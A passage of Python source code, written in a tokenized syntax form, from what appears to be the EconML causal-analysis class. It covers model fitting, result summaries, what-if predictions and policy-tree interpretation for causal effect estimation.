bool))<block_start>heterogeneity_inds=[heterogeneity_inds<for>_ train_inds]<block_end># heterogeneity inds should be a 2D list of length same as train_inds <elif_stmt>heterogeneity_inds<is><not><none><and>len(heterogeneity_inds)<ne>len(train_inds)<block_start><raise>ValueError("Heterogeneity indexes should have the same number of entries, but here "<concat>f" there were {len(heterogeneity_inds)} heterogeneity entries but "<concat>f" {len(train_inds)} feature indices.")<block_end># replace None elements of heterogeneity_inds and ensure indices are numeric heterogeneity_inds={ind:list(range(X.shape[1]))<if>hinds<is><none><else>_get_column_indices(X hinds)<for>ind,hinds zip(train_inds heterogeneity_inds)}<if_stmt>warm_start<block_start>train_y_model=<false><if_stmt>self.nuisance_models<ne>self.nuisance_models_<block_start>warnings.warn("warm_start will be ignored since the nuisance models have changed "<concat>f"from {self.nuisance_models_} to {self.nuisance_models} since the previous call to fit")<line_sep>warm_start=<false><line_sep>train_y_model=<true><block_end><if_stmt>self.heterogeneity_model<ne>self.heterogeneity_model_<block_start>warnings.warn("warm_start will be ignored since the heterogeneity model has changed "<concat>f"from {self.heterogeneity_model_} to {self.heterogeneity_model} "<concat>"since the previous call to fit")<line_sep>warm_start=<false><block_end># TODO: bail out also if categorical columns, classification, random_state changed? <block_end><else_stmt><block_start>train_y_model=<true><block_end># TODO: should we also train a new model_y under any circumstances when warm_start is True? <if_stmt>warm_start<block_start>new_inds=[ind<for>ind train_inds<if>(ind<not><in>self._cache<or>heterogeneity_inds[ind]<ne>self._cache[ind][1].hinds)]<block_end><else_stmt><block_start>new_inds=list(train_inds)<line_sep>self._cache={}# store mapping from feature to insights, results # train the Y model <if_stmt>train_y_model# perform model selection for the Y model using all X, not on a per-column basis <block_start>allX=ColumnTransformer([('encode' OneHotEncoder(drop='first' sparse=<false>) self.categorical)] remainder=StandardScaler()).fit_transform(X)<if_stmt>self.verbose<g>0<block_start>print("CausalAnalysis: performing model selection on overall Y model")<block_end><if_stmt>self.classification<block_start>self._model_y=_first_stage_clf(allX y automl=self.nuisance_models<eq>'automl' make_regressor=<true> random_state=self.random_state verbose=self.verbose)<block_end><else_stmt><block_start>self._model_y=_first_stage_reg(allX y automl=self.nuisance_models<eq>'automl' random_state=self.random_state verbose=self.verbose)<block_end><block_end><block_end><if_stmt>self.classification# now that we've trained the classifier and wrapped it, ensure that y is transformed to # work with the regression wrapper # we use column_or_1d to treat pd.Series and pd.DataFrame objects the same way as arrays <block_start>y=column_or_1d(y).reshape(-1 1)<line_sep># note that this needs to happen after wrapping to generalize to the multi-class case, # since otherwise we'll have too many columns to be able to train a classifier y=OneHotEncoder(drop='first' sparse=<false>).fit_transform(y)<block_end><assert_stmt>y.ndim<eq>1<or>y.shape[1]<eq>1 ("Multiclass classification isn't supported"<if>self.classification<else>"Only a single outcome is supported")<line_sep>self._vec_y=y.ndim<eq>1<line_sep>self._d_x=X.shape[1]<line_sep># start with empty results and default shared insights self._results=[]<line_sep>self._shared=_get_default_shared_insights_output()<line_sep>self._shared[_CausalInsightsConstants.InitArgsKey]={'feature_inds':_sanitize(self.feature_inds) 'categorical':_sanitize(self.categorical) 'heterogeneity_inds':_sanitize(self.heterogeneity_inds) 'feature_names':_sanitize(self.feature_names) 'classification':_sanitize(self.classification) 'upper_bound_on_cat_expansion':_sanitize(self.upper_bound_on_cat_expansion) 'nuisance_models':_sanitize(self.nuisance_models) 'heterogeneity_model':_sanitize(self.heterogeneity_model) 'categories':_sanitize(self.categories) 'n_jobs':_sanitize(self.n_jobs) 'verbose':_sanitize(self.verbose) 'random_state':_sanitize(self.random_state)}<line_sep># convert categorical indicators to numeric indices categorical_inds=_get_column_indices(X self.categorical)<line_sep>categories=self.categories<if_stmt>categories<eq>'auto'<block_start>categories=['auto'<for>_ categorical_inds]<block_end><else_stmt><block_start><assert_stmt>len(categories)<eq>len(categorical_inds) ("If categories is not 'auto', it must contain one entry per categorical column. Instead, categories"<concat>f"has length {len(categories)} while there are {len(categorical_inds)} categorical columns.")<block_end># check for indices over the categorical expansion bound invalid_inds=getattr(self 'untrained_feature_indices_' [])<line_sep># assume we'll be able to train former failures this time; we'll add them back if not invalid_inds=[(ind reason)<for>(ind reason) invalid_inds<if>ind<not><in>new_inds]<line_sep>self._has_column_names=<true><if_stmt>self.feature_names<is><none><block_start><if_stmt>hasattr(X "iloc")<block_start>feature_names=X.columns<block_end><else_stmt><block_start>self._has_column_names=<false><line_sep>feature_names=[f"x{i}"<for>i range(X.shape[1])]<block_end><block_end><else_stmt><block_start>feature_names=self.feature_names<block_end>self.feature_names_=feature_names<line_sep>min_counts={}<for_stmt>ind new_inds<block_start>column_text=self._format_col(ind)<if_stmt>ind<in>categorical_inds<block_start>cats,counts=np.unique(_safe_indexing(X ind axis=1) return_counts=<true>)<line_sep>min_ind=np.argmin(counts)<line_sep>n_cat=len(cats)<if_stmt>n_cat<g>self.upper_bound_on_cat_expansion<block_start>warnings.warn(f"{column_text} has more than {self.upper_bound_on_cat_expansion} "<concat>f"values (found {n_cat}) so no heterogeneity model will be fit for it; "<concat>"increase 'upper_bound_on_cat_expansion' to change this behavior.")<line_sep># can't remove in place while iterating over new_inds, so store in separate list invalid_inds.append((ind 'upper_bound_on_cat_expansion'))<block_end><elif_stmt>counts[min_ind]<l>_CAT_LIMIT<block_start><if_stmt>self.skip_cat_limit_checks<and>(counts[min_ind]<ge>5<or>(counts[min_ind]<ge>2<and>self.heterogeneity_model<ne>'forest'))# train the model, but warn <block_start>warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "<concat>f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}). "<concat>"A model will still be fit because 'skip_cat_limit_checks' is True, "<concat>"but this model may not be robust.")<line_sep>min_counts[ind]=counts[min_ind]<block_end><elif_stmt>counts[min_ind]<l>2<or>(counts[min_ind]<l>5<and>self.heterogeneity_model<eq>'forest')# no model can be trained in this case since we need more folds <block_start>warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "<concat>"the training dataset, but linear heterogeneity models need at least 2 and "<concat>"forest heterogeneity models need at least 5 instances, so no model will be fit "<concat>"for this column")<line_sep>invalid_inds.append((ind 'cat_limit'))<block_end><else_stmt># don't train a model, but suggest workaround since there are enough instances of least # populated class <block_start>warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "<concat>f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}), "<concat>"so no heterogeneity model will be fit for it. This check can be turned off by "<concat>"setting 'skip_cat_limit_checks' to True, but that may result in an inaccurate "<concat>"model for this feature.")<line_sep>invalid_inds.append((ind 'cat_limit'))<block_end><block_end><block_end><block_end><for_stmt>(ind _) invalid_inds<block_start>new_inds.remove(ind)<line_sep># also remove from train_inds so we don't try to access the result later train_inds.remove(ind)<if_stmt>len(train_inds)<eq>0<block_start><raise>ValueError("No features remain; increase the upper_bound_on_cat_expansion and ensure that there "<concat>"are several instances of each categorical value so that at least "<concat>"one feature model can be trained.")<block_end><block_end># extract subset of names matching new columns new_feat_names=_safe_indexing(feature_names new_inds)<line_sep>cache_updates=dict(zip(new_inds joblib.Parallel(n_jobs=self.n_jobs verbose=self.verbose)(joblib.delayed(_process_feature)(feat_name feat_ind self.verbose categorical_inds categories heterogeneity_inds min_counts y X self.nuisance_models self.heterogeneity_model self.random_state self._model_y self.cv self.mc_iters)<for>feat_name,feat_ind zip(new_feat_names new_inds))))<line_sep># track indices where an exception was thrown, since we can't remove from dictionary while iterating inds_to_remove=[]<for_stmt>ind,value cache_updates.items()<block_start><if_stmt>isinstance(value Exception)# don't want to cache this failed result <block_start>inds_to_remove.append(ind)<line_sep>train_inds.remove(ind)<line_sep>invalid_inds.append((ind value))<block_end><block_end><for_stmt>ind inds_to_remove<block_start><del_stmt>cache_updates[ind]<block_end>self._cache.update(cache_updates)<for_stmt>ind train_inds<block_start>dict_update,result=self._cache[ind]<line_sep>self._results.append(result)<for_stmt>k dict_update<block_start>self._shared[k]<augadd>dict_update[k]<block_end><block_end>invalid_inds.sort()<line_sep>self.untrained_feature_indices_=invalid_inds<line_sep>self.trained_feature_indices_=train_inds<line_sep>self.nuisance_models_=self.nuisance_models<line_sep>self.heterogeneity_model_=self.heterogeneity_model<line_sep><return>self<block_end><def_stmt>_format_col self ind<block_start><if_stmt>self._has_column_names<block_start><return>f"Column {ind} ({self.feature_names_[ind]})"<block_end><else_stmt><block_start><return>f"Column {ind}"<block_end><block_end># properties to return from effect InferenceResults @staticmethod<def_stmt>_point_props alpha<block_start><return>[(_CausalInsightsConstants.PointEstimateKey 'point_estimate') (_CausalInsightsConstants.StandardErrorKey 'stderr') (_CausalInsightsConstants.ZStatKey 'zstat') (_CausalInsightsConstants.PValueKey 'pvalue') (_CausalInsightsConstants.ConfidenceIntervalLowerKey <lambda>inf:inf.conf_int(alpha=alpha)[0]) (_CausalInsightsConstants.ConfidenceIntervalUpperKey <lambda>inf:inf.conf_int(alpha=alpha)[1])]<block_end># properties to return from PopulationSummaryResults @staticmethod<def_stmt>_summary_props alpha<block_start><return>[(_CausalInsightsConstants.PointEstimateKey 'mean_point') (_CausalInsightsConstants.StandardErrorKey 'stderr_mean') (_CausalInsightsConstants.ZStatKey 'zstat') (_CausalInsightsConstants.PValueKey 'pvalue') (_CausalInsightsConstants.ConfidenceIntervalLowerKey <lambda>inf:inf.conf_int_mean(alpha=alpha)[0]) (_CausalInsightsConstants.ConfidenceIntervalUpperKey <lambda>inf:inf.conf_int_mean(alpha=alpha)[1])]<block_end># Converts strings to property lookups or method calls as a convenience so that the # _point_props and _summary_props above can be applied to an inference object @staticmethod<def_stmt>_make_accessor attr<block_start><if_stmt>isinstance(attr str)<block_start>s=attr<def_stmt>attr o<block_start>val=getattr(o s)<if_stmt>callable(val)<block_start><return>val()<block_end><else_stmt><block_start><return>val<block_end><block_end><block_end><return>attr<block_end># Create a summary combining all results into a single output; this is used # by the various causal_effect and causal_effect_dict methods to generate either a dataframe # or a dictionary, respectively, based on the summary function passed into this method <def_stmt>_summarize self * summary get_inference props expand_arr drop_sample<block_start><assert_stmt>hasattr(self "_results") "This object has not been fit, so cannot get results"<line_sep># ensure array has shape (m,y,t) <def_stmt>ensure_proper_dims arr<block_start><if_stmt>expand_arr# population summary is missing sample dimension; add it for consistency <block_start>arr=np.expand_dims(arr 0)<block_end><if_stmt>self._vec_y# outcome dimension is missing; add it for consistency <block_start>arr=np.expand_dims(arr axis=1)<block_end><assert_stmt>2<le>arr.ndim<le>3<line_sep># add singleton treatment dimension if missing <return>arr<if>arr.ndim<eq>3<else>np.expand_dims(arr axis=2)<block_end># store set of inference results so we don't need to recompute per-attribute below in summary/coalesce infs=[get_inference(res)<for>res self._results]<line_sep># each attr has dimension (m,y) or (m,y,t) <def_stmt>coalesce attr<block_start>"""Join together the arrays for each feature"""<line_sep>attr=self._make_accessor(attr)<line_sep># concatenate along treatment dimension arr=np.concatenate([ensure_proper_dims(attr(inf))<for>inf infs] axis=2)<line_sep># for dictionary representation, want to remove unneeded sample dimension # in cohort and global results <if_stmt>drop_sample<block_start>arr=np.squeeze(arr 0)<block_end><return>arr<block_end><return>summary([(key coalesce(val))<for>key,val props])<block_end><def_stmt>_pandas_summary self get_inference * props n expand_arr=<false> keep_all_levels=<false><block_start>""" Summarizes results into a dataframe. Parameters ---------- get_inference : lambda Method to get the relevant inference results from each result object props : list of (string, string or lambda) Set of column names and ways to get the corresponding values from the inference object n : int The number of samples in the dataset expand_arr : boolean, default False Whether to add a synthetic sample dimension to the result arrays when performing internal computations keep_all_levels : boolean, default False Whether to keep all levels, even when they don't take on more than one value; Note that regardless of this argument the "sample" level will only be present if expand_arr is False """<def_stmt>make_dataframe props<block_start>to_include=OrderedDict([(key value.reshape(-1))<for>key,value props])<line_sep># TODO: enrich outcome logic for multi-class classification when that is supported index=pd.MultiIndex.from_tuples([(i outcome res.feature_name f"{lvl}v{res.feature_baseline}"<if>res.feature_baseline<is><not><none><else>lvl)<for>i range(n)<for>outcome ["y0"]<for>res self._results<for>lvl res.feature_levels] names=["sample" "outcome" "feature" "feature_value"])<if_stmt>expand_arr# There is no actual sample level in this data <block_start>index=index.droplevel("sample")<block_end><if_stmt><not>keep_all_levels<block_start><for_stmt>lvl index.levels<block_start><if_stmt>len(lvl)<eq>1<block_start><if_stmt><not>isinstance(index pd.MultiIndex)# can't drop only level <block_start>index=pd.Index([self._results[0].feature_name] name="feature")<block_end><else_stmt><block_start>index=index.droplevel(lvl.name)<block_end><block_end><block_end><block_end><return>pd.DataFrame(to_include index=index)<block_end><return>self._summarize(summary=make_dataframe get_inference=get_inference props=props expand_arr=expand_arr drop_sample=<false>)<block_end># dropping the sample dimension is handled above instead <def_stmt>_dict_summary self get_inference * n props kind drop_sample=<false> expand_arr=<false> row_wise=<false><block_start>""" Summarizes results into a dictionary. Parameters ---------- get_inference : lambda Method to get the relevant inference results from each result object n : int The number of samples in the dataset props : list of (string, string or lambda) Set of column names and ways to get the corresponding values from the inference object kind : string The kind of inference results to get (e.g. 'global', 'local', or 'cohort') drop_sample : boolean, default False Whether to drop the sample dimension from each array expand_arr : boolean, default False Whether to add an initial sample dimension to the result arrays row_wise : boolean, default False Whether to return a list of dictionaries (one dictionary per row) instead of a dictionary of lists (one list per column) """<def_stmt>make_dict props# should be serialization-ready and contain no numpy arrays <block_start>res=_get_default_specific_insights(kind)<line_sep>shared=self._shared<if_stmt>row_wise<block_start>row_data={}<line_sep># remove entries belonging to row data, since we're including them in the list of nested dictionaries <for_stmt>k _get_data_causal_insights_keys()<block_start><del_stmt>res[k]<block_end>shared=shared.copy()# copy so that we can modify without affecting shared state # TODO: Note that there's no column metadata for the sample number - should there be? <for_stmt>k _get_column_causal_insights_keys()# need to replicate the column info for each sample, then remove from the shared data <block_start>row_data[k]=shared[k]<times>n<del_stmt>shared[k]<block_end># NOTE: the flattened order has the ouptut dimension before the feature dimension # which may need to be revisited once we support multiclass row_data.update([(key value.flatten())<for>key,value props])<line_sep># get the length of the list corresponding to the first dictionary key # `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into n_rows=len(row_data[list(row_data)[0]])<line_sep>res[_CausalInsightsConstants.RowData]=[{key:row_data[key][i]<for>key row_data}<for>i range(n_rows)]<block_end><else_stmt><block_start>res.update([(key value.tolist())<for>key,value props])<block_end><return>{**shared **res}<block_end><return>self._summarize(summary=make_dict get_inference=get_inference props=props expand_arr=expand_arr drop_sample=drop_sample)<block_end><def_stmt>global_causal_effect self * alpha=0.05 keep_all_levels=<false><block_start>""" Get the global causal effect for each feature as a pandas DataFrame. Parameters ---------- alpha : float, default 0.05 The confidence level of the confidence interval keep_all_levels : bool, default False Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level') even if there was only a single value for that level; by default single-valued levels are dropped. Returns ------- global_effects : pandas Dataframe DataFrame with the following structure: :Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper'] :Index: ['feature', 'feature_value'] :Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where 'num' is literally the string 'num' and feature_name is the input feature name. For each feature that is categorical, we have an entry with index ['{feature_name}', '{cat}v{base}'] where cat is the category value and base is the category used as baseline. If all features are numerical then the feature_value index is dropped in the dataframe, but not in the serialized dict. """<line_sep># a global inference indicates the effect of that one feature on the outcome <return>self._pandas_summary(<lambda>res:res.global_inference props=self._point_props(alpha) n=1 expand_arr=<true> keep_all_levels=keep_all_levels)<block_end><def_stmt>_global_causal_effect_dict self * alpha=0.05 row_wise=<false><block_start>""" Gets the global causal effect for each feature as dictionary. Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t)) Only for serialization purposes to upload to AzureML """<line_sep><return>self._dict_summary(<lambda>res:res.global_inference props=self._point_props(alpha) kind='global' n=1 row_wise=row_wise drop_sample=<true> expand_arr=<true>)<block_end><def_stmt>_cohort_effect_inference self Xtest<block_start><assert_stmt>np.ndim(Xtest)<eq>2<and>np.shape(Xtest)[1]<eq>self._d_x ("Shape of Xtest must be compatible with shape of X, "<concat>f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})")<def_stmt>inference_from_result result<block_start>est=result.estimator<line_sep>X=result.X_transformer.transform(Xtest)<if_stmt>X.shape[1]<eq>0<block_start>X=<none><block_end><return>est.const_marginal_ate_inference(X=X)<block_end><return>inference_from_result<block_end><def_stmt>cohort_causal_effect self Xtest * alpha=0.05 keep_all_levels=<false><block_start>""" Gets the average causal effects for a particular cohort defined by a population of X's. Parameters ---------- Xtest : array-like The cohort samples for which to return the average causal effects within cohort alpha : float, default 0.05 The confidence level of the confidence interval keep_all_levels : bool, default False Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level') even if there was only a single value for that level; by default single-valued levels are dropped. Returns ------- cohort_effects : pandas Dataframe DataFrame with the following structure: :Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper'] :Index: ['feature', 'feature_value'] :Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where 'num' is literally the string 'num' and feature_name is the input feature name. For each feature that is categorical, we have an entry with index ['{feature_name}', '{cat}v{base}'] where cat is the category value and base is the category used as baseline. If all features are numerical then the feature_value index is dropped in the dataframe, but not in the serialized dict. """<line_sep><return>self._pandas_summary(self._cohort_effect_inference(Xtest) props=self._summary_props(alpha) n=1 expand_arr=<true> keep_all_levels=keep_all_levels)<block_end><def_stmt>_cohort_causal_effect_dict self Xtest * alpha=0.05 row_wise=<false><block_start>""" Gets the cohort causal effects for each feature as dictionary. Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t)) Only for serialization purposes to upload to AzureML """<line_sep><return>self._dict_summary(self._cohort_effect_inference(Xtest) props=self._summary_props(alpha) kind='cohort' n=1 row_wise=row_wise expand_arr=<true> drop_sample=<true>)<block_end><def_stmt>_local_effect_inference self Xtest<block_start><assert_stmt>np.ndim(Xtest)<eq>2<and>np.shape(Xtest)[1]<eq>self._d_x ("Shape of Xtest must be compatible with shape of X, "<concat>f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})")<def_stmt>inference_from_result result<block_start>est=result.estimator<line_sep>X=result.X_transformer.transform(Xtest)<if_stmt>X.shape[1]<eq>0<block_start>X=<none><block_end>eff=est.const_marginal_effect_inference(X=X)<if_stmt>X<is><none># need to reshape the output to match the input <block_start>eff=eff._expand_outputs(Xtest.shape[0])<block_end><return>eff<block_end><return>inference_from_result<block_end><def_stmt>local_causal_effect self Xtest * alpha=0.05 keep_all_levels=<false><block_start>""" Gets the local causal effect for each feature as a pandas DataFrame. Parameters ---------- Xtest : array-like The samples for which to return the causal effects alpha : float, default 0.05 The confidence level of the confidence interval keep_all_levels : bool, default False Whether to keep all levels of the output dataframe ('sample', 'outcome', 'feature', and 'feature_level') even if there was only a single value for that level; by default single-valued levels are dropped. Returns ------- global_effect : pandas Dataframe DataFrame with the following structure: :Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper'] :Index: ['sample', 'feature', 'feature_value'] :Rows: For each feature that is numeric, we have an entry with index ['{sampleid}', '{feature_name}', 'num'], where 'num' is literally the string 'num' and feature_name is the input feature name and sampleid is the index of the sample in Xtest. For each feature that is categorical, we have an entry with index ['{sampleid', '{feature_name}', '{cat}v{base}'] where cat is the category value and base is the category used as baseline. If all features are numerical then the feature_value index is dropped in the dataframe, but not in the serialized dict. """<line_sep><return>self._pandas_summary(self._local_effect_inference(Xtest) props=self._point_props(alpha) n=Xtest.shape[0] keep_all_levels=keep_all_levels)<block_end><def_stmt>_local_causal_effect_dict self Xtest * alpha=0.05 row_wise=<false><block_start>""" Gets the local feature importance as dictionary Dictionary entries for predictions, etc. will be nested lists of shape (n_rows, d_y, sum(d_t)) Only for serialization purposes to upload to AzureML """<line_sep><return>self._dict_summary(self._local_effect_inference(Xtest) props=self._point_props(alpha) kind='local' n=Xtest.shape[0] row_wise=row_wise)<block_end><def_stmt>_safe_result_index self X feature_index<block_start><assert_stmt>hasattr(self "_results") "This instance has not yet been fitted"<assert_stmt>np.ndim(X)<eq>2<and>np.shape(X)[1]<eq>self._d_x ("Shape of X must be compatible with shape of the fitted X, "<concat>f"but got shape {np.shape(X)} instead of (n, {self._d_x})")<line_sep>(numeric_index )=_get_column_indices(X [feature_index])<line_sep>bad_inds=dict(self.untrained_feature_indices_)<if_stmt>numeric_index<in>bad_inds<block_start>error=bad_inds[numeric_index]<line_sep>col_text=self._format_col(numeric_index)<if_stmt>error<eq>'cat_limit'<block_start>msg=f"{col_text} had a value with fewer than {_CAT_LIMIT} occurences, so no model was fit for it"<block_end><elif_stmt>error<eq>'upper_bound_on_cat_expansion'<block_start>msg=(f"{col_text} had more distinct values than the setting of 'upper_bound_on_cat_expansion', "<concat>"so no model was fit for it")<block_end><else_stmt><block_start>msg=(f"{col_text} generated the following error during fitting, "<concat>f"so no model was fit for it:\n{str(error)}")<block_end><raise>ValueError(msg)<block_end><if_stmt>numeric_index<not><in>self.trained_feature_indices_<block_start><raise>ValueError(f"{self._format_col(numeric_index)} was not passed as a feature index "<concat>"so no model was fit for it")<block_end>results=[res<for>res self._results<if>res.feature_index<eq>numeric_index]<assert_stmt>len(results)<eq>1<line_sep>(result )=results<line_sep><return>result<block_end><def_stmt>_whatif_inference self X Xnew feature_index y<block_start><assert_stmt><not>self.classification "What-if analysis cannot be applied to classification tasks"<assert_stmt>np.shape(X)[0]<eq>np.shape(Xnew)[0]<eq>np.shape(y)[0] ("X, Xnew, and y must have the same length, but have shapes "<concat>f"{np.shape(X)}, {np.shape(Xnew)}, and {np.shape(y)}")<assert_stmt>np.size(feature_index)<eq>1 f"Only one feature index may be changed, but got {np.size(feature_index)}"<line_sep>T0=_safe_indexing(X feature_index axis=1)<line_sep>T1=Xnew<line_sep>result=self._safe_result_index(X feature_index)<line_sep>X=result.X_transformer.transform(X)<if_stmt>X.shape[1]<eq>0<block_start>X=<none><block_end>inf=result.estimator.effect_inference(X=X T0=T0 T1=T1)<line_sep># we want to offset the inference object by the baseline estimate of y inf.translate(y)<line_sep><return>inf<block_end><def_stmt>whatif self X Xnew feature_index y * alpha=0.05<block_start>""" Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart. Note that this only applies to regression use cases; for classification what-if analysis is not supported. Parameters ---------- X: array-like Features Xnew: array-like New values of a single column of X feature_index: int or string The index of the feature being varied to Xnew, either as a numeric index or the string name if the input is a dataframe y: array-like Observed labels or outcome of a predictive model for baseline y values alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. Returns ------- y_new: DataFrame The predicted outputs that would have been observed under the counterfactual features """<line_sep><return>self._whatif_inference(X Xnew feature_index y).summary_frame(alpha=alpha)<block_end><def_stmt>_whatif_dict self X Xnew feature_index y * alpha=0.05 row_wise=<false><block_start>""" Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart. Note that this only applies to regression use cases; for classification what-if analysis is not supported. Parameters ---------- X: array-like Features Xnew: array-like New values of a single column of X feature_index: int or string The index of the feature being varied to Xnew, either as a numeric index or the string name if the input is a dataframe y: array-like Observed labels or outcome of a predictive model for baseline y values alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. row_wise : boolean, default False Whether to return a list of dictionaries (one dictionary per row) instead of a dictionary of lists (one list per column) Returns ------- dict : dict The counterfactual predictions, as a dictionary """<line_sep>inf=self._whatif_inference(X Xnew feature_index y)<line_sep>props=self._point_props(alpha=alpha)<line_sep>res=_get_default_specific_insights('whatif')<if_stmt>row_wise<block_start>row_data={}<line_sep># remove entries belonging to row data, since we're including them in the list of nested dictionaries <for_stmt>k _get_data_causal_insights_keys()<block_start><del_stmt>res[k]<block_end>row_data.update([(key self._make_accessor(attr)(inf).flatten())<for>key,attr props])<line_sep># get the length of the list corresponding to the first dictionary key # `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into n_rows=len(row_data[list(row_data)[0]])<line_sep>res[_CausalInsightsConstants.RowData]=[{key:row_data[key][i]<for>key row_data}<for>i range(n_rows)]<block_end><else_stmt><block_start>res.update([(key self._make_accessor(attr)(inf).tolist())<for>key,attr props])<block_end><return>res<block_end><def_stmt>_tree self is_policy Xtest feature_index * treatment_costs=0 max_depth=3 min_samples_leaf=2 min_impurity_decrease=1e-4 include_model_uncertainty=<false> alpha=0.05<block_start>result=self._safe_result_index(Xtest feature_index)<line_sep>Xtest=result.X_transformer.transform(Xtest)<if_stmt>Xtest.shape[1]<eq>0<block_start>Xtest=<none><block_end><if_stmt>result.feature_baseline<is><none><block_start>treatment_names=['decrease' 'increase']<block_end><else_stmt><block_start>treatment_names=[f"{result.feature_baseline}"]+[f"{lvl}"<for>lvl result.feature_levels]<block_end>TreeType=SingleTreePolicyInterpreter<if>is_policy<else>SingleTreeCateInterpreter<line_sep>intrp=TreeType(include_model_uncertainty=include_model_uncertainty uncertainty_level=alpha max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_impurity_decrease random_state=self.random_state)<if_stmt>is_policy<block_start>intrp.interpret(result.estimator Xtest sample_treatment_costs=treatment_costs)<if_stmt>result.feature_baseline<is><none># continuous treatment, so apply a treatment level 10% of typical <block_start>treatment_level=result.treatment_value<times>0.1<line_sep># NOTE: this calculation is correct only if treatment costs are marginal costs, # because then scaling the difference between treatment value and treatment costs is the # same as scaling the treatment value and subtracting the scaled treatment cost. # # Note also that unlike the standard outputs of the SinglePolicyTreeInterpreter, for # continuous treatments, the policy value should include the benefit of decreasing treatments # (rather than just not treating at all) # # We can get the total by seeing that if we restrict attention to units where we would treat, # 2 * policy_value - always_treat # includes exactly their contribution because policy_value and always_treat both include it # and likewise restricting attention to the units where we want to decrease treatment, # 2 * policy_value - always-treat # also computes the *benefit* of decreasing treatment, because their contribution to policy_value # is zero and the contribution to always_treat is negative treatment_total=(2<times>intrp.policy_value_-intrp.always_treat_value_.item())<times>treatment_level<line_sep>always_totals=intrp.always_treat_value_<times>treatment_level<block_end><else_stmt><block_start>treatment_total=intrp.policy_value_<line_sep>always_totals=intrp.always_treat_value_<block_end>policy_values=treatment_total always_totals<block_end><else_stmt># no policy values for CATE trees <block_start>intrp.interpret(result.estimator Xtest)<line_sep>policy_values=<none><block_end><return>intrp result.X_transformer.get_feature_names(self.feature_names_) treatment_names policy_values<block_end># TODO: it seems like it would be better to just return the tree itself rather than plot it; # however, the tree can't store the feature and treatment names we compute here... <def_stmt>plot_policy_tree self Xtest feature_index * treatment_costs=0 max_depth=3 min_samples_leaf=2 min_value_increase=1e-4 include_model_uncertainty=<false> alpha=0.05<block_start>""" Plot a recommended policy tree using matplotlib. Parameters ---------- X : array-like Features feature_index Index of the feature to be considered as treament treatment_costs: array-like, default 0 Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per unit of treatment; for discrete features, this is the difference in cost between each of the non-default values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1)) max_depth : int, default 3 maximum depth of the tree min_samples_leaf : int, default 2 minimum number of samples on each leaf min_value_increase : float, default 1e-4 The minimum increase in the policy value that a split needs to create to construct it include_model_uncertainty : bool, default False Whether to include confidence interval information when building a simplified model of the cate model. alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. """<line_sep>intrp,feature_names,treatment_names,_=self._tree(<true> Xtest feature_index treatment_costs=treatment_costs max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_value_increase include_model_uncertainty=include_model_uncertainty alpha=alpha)<line_sep><return>intrp.plot(feature_names=feature_names treatment_names=treatment_names)<block_end><def_stmt>_policy_tree_output self Xtest feature_index * treatment_costs=0 max_depth=3 min_samples_leaf=2 min_value_increase=1e-4 alpha=0.05<block_start>""" Get a tuple of policy outputs. The first item in the tuple is the recommended policy tree expressed as a dictionary. The second item is the per-unit-average value of applying the learned policy; if the feature is continuous this means the gain from increasing the treatment by 10% of the typical amount for units where the treatment should be increased and decreasing the treatment by 10% of the typical amount when not. The third item is the value of always treating. This is a list, with one entry per non-control-treatment for discrete features, or just a single entry for continuous features, again increasing by 10% of a typical amount. Parameters ---------- X : array-like Features feature_index Index of the feature to be considered as treament treatment_costs: array-like, default 0 Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per unit of treatment; for discrete features, this is the difference in cost between each of the non-default values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1)) max_depth : int, default 3 maximum depth of the tree min_samples_leaf : int, default 2 minimum number of samples on each leaf min_value_increase : float, default 1e-4 The minimum increase in the policy value that a split needs to create to construct it alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. Returns ------- output : _PolicyOutput """<line_sep>(intrp feature_names treatment_names (policy_val always_trt))=self._tree(<true> Xtest feature_index treatment_costs=treatment_costs max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_value_increase alpha=alpha)<def_stmt>policy_data tree node_id node_dict<block_start><return>{'treatment':treatment_names[np.argmax(tree.value[node_id])]}<block_end><return>_PolicyOutput(_tree_interpreter_to_dict(intrp feature_names policy_data) policy_val {treatment_names[i+1]:val<for>(i val) enumerate(always_trt.tolist())} treatment_names[0])<block_end># TODO: it seems like it would be better to just return the tree itself rather than plot it; # however, the tree can't store the feature and treatment names we compute here... <def_stmt>plot_heterogeneity_tree self Xtest feature_index * max_depth=3 min_samples_leaf=2 min_impurity_decrease=1e-4 include_model_uncertainty=<false> alpha=0.05<block_start>""" Plot an effect hetergoeneity tree using matplotlib. Parameters ---------- X : array-like Features feature_index 